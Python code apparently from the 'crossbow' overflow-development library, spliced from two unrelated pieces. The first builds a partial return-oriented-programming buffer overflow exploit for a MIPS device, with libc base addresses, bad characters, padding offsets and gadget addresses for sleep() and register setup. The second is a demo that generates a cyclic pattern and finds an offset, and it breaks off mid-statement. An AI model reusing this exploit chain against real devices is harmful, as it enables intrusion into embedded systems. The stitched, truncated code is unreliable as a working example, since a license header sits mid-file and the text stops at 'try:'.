libc_qemu_base=0x4084a000
libc_actual_base=0x2aaee000
libc_base=0
if qemu:
libc_base=libc_qemu_base
else:
libc_base=libc_actual_base
badchars=['\0',0x0d,'\n',0x20]
buf=EmptyOverflowBuffer(LittleEndian,default_base=libc_base,badchars=badchars,maxlength=2048)
buf.add_pattern(528)
#function_epilogue_rop
buf.add_rop_gadget(0x31b44,
description="[$ra] function epilogue that sets up $s1-$s7")
buf.add_pattern(620-buf.len())
#address of sleep
buf.add_rop_gadget(0x506c0,
description="Address of sleep() in libc. be sure to set up $ra and $a0 before calling.")
buf.add_pattern(628-buf.len())
#placeholder address that can be dereferenced without crashing, this goes in $s2
buf.add_rop_gadget(0x427a4,
description="[$s2] placeholder, derefed without crashing.")
#
# See LICENSE.txt for more details.
#
import sys
import os
sys.path.insert(0,os.path.abspath('..'))
from crossbow.overflow_development.overflowbuilder import EmptyOverflowBuffer
from crossbow.common.support import BigEndian
from crossbow.common.support import Logging
logger=Logging()
logger.LOG_INFO("Creating empty overflow buffer")
buf=EmptyOverflowBuffer(BigEndian,badchars=['A','B','6'])
buf.add_pattern(1024)
logger.LOG_INFO("Length of empty overflow buffer: %d" % buf.len())
buf.print_section_descriptions()
print buf.pretty_string()
logger.LOG_INFO("Offet of \"u3Au4\": %d" % buf.find_offset("u3Au4"))
logger.LOG_INFO("Creating second emtpy overflow buffer")
buf2=EmptyOverflowBuffer(BigEndian,badchars=['A','B','6'])
try: